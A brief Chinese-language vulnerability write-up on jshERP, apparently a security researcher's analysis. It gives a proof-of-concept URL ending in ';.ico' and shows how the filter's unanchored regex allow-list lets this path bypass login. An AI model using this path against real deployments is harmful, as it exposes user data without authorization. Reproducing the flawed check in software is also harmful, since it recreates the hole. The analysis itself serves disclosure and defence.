POC:
/jshERP-boot/user/getAllList;.ico
调试分析poc:
这是poc很明显就是绕过权限,我们分析filter里面的代码。
@Overridepublic void doFilter(ServletRequest request, ServletResponse response,FilterChain chain) throws IOException, ServletException {HttpServletRequest servletRequest = (HttpServletRequest) request;HttpServletResponse servletResponse = (HttpServletResponse) response;String requestUrl = servletRequest.getRequestURI();//具体,比如:处理若用户未登录,则跳转到登录页Object userId = redisService.getObjectFromSessionByKey(servletRequest,"userId");if(userId!=null) { //如果已登录,不阻止chain.doFilter(request, response);return;}if (requestUrl != null && (requestUrl.contains("/doc.html") ||requestUrl.contains("/register.html") || requestUrl.contains("/login.html"))) {chain.doFilter(request, response);return;}if (verify(ignoredList, requestUrl)) {chain.doFilter(servletRequest, response);return;}if (null != allowUrls && allowUrls.length > 0) {for (String url : allowUrls) {if (requestUrl.startsWith(url)) {chain.doFilter(request, response);return;}}}servletResponse.sendRedirect("/login.html");}
这里需要关注的点是verify方法,我们唯一可以控制的地方。分析verify方法:
private static String regexPrefix = "^.*";private static String regexSuffix = ".*$";private static boolean verify(List<String> ignoredList, String url) {for (String regex : ignoredList) {Pattern pattern = Pattern.compile(regexPrefix + regex + regexSuffix);Matcher matcher = pattern.matcher(url);if (matcher.matches()) {return true;}}return false;}
这里需要关注的点是ignoredList值,观察以下代码发现ignoredList与ignoredUrl有关。
ignoredUrl的值是请求中默认的,为".ico"
因此poc中结尾包含".ico",即可绕过权限,这里使用分号隔开从而绕过权限。